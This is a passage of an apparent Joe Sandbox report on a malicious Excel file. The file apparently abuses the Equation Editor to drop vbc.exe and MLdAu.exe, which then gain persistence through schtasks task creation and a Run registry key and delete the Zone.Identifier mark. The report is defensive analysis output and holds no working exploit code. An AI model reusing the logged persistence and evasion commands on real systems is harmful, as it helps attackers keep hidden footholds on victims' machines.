                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AC77
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D040
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002798A8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00278088
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002708F4
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AD40
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002771E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027CDE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027EE28
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027EE18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D2A0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027F2B1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027F2C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00271768
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00278B80
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027C790
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_00235928
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_00236540
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_00235C70
                      Source: Doc2.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Doc_87654334567[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@18/28@7/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Doc2.xlsxJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMutant created: \Sessions\1\BaseNamedObjects\bCmLOidXVAcpgGmAXeH
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE54.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`.$...............$.....(.P.....h.......p.......................................................................................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................d...........E.R.R.O.R.:. ...................................................................(...............................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................d...........E.R.R.O.(.P.............................$...............................................j.......................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................H.!.........E.R.R.O.R.:. .............................................................................................!.....
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................H.!.........E.R.R.O.(.P.............................................................................j.................!.....
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Doc2.xlsxReversingLabs: Detection: 28%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: Doc2.xlsxStatic file information: File size 1239552 > 1048576
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
                      Source: Doc2.xlsxInitial sample: OLE indicators vbamacros = False
                      Source: Doc2.xlsxInitial sample: OLE indicators encrypted = True

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: vbc.exe.4.dr, Utilities/YatcForm.cs.Net Code: EFEFEFEFEFEF System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_10727F11 push es; iretd
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00319718 push esp; retf
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_10FC7F11 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E7198 push eax; retn 0018h
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E9718 push esp; retf
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8B80 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00279718 push esp; retf
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_10FC7F11 push es; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.51973544971
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.51973544971
                      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAuJump to behavior
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAuJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
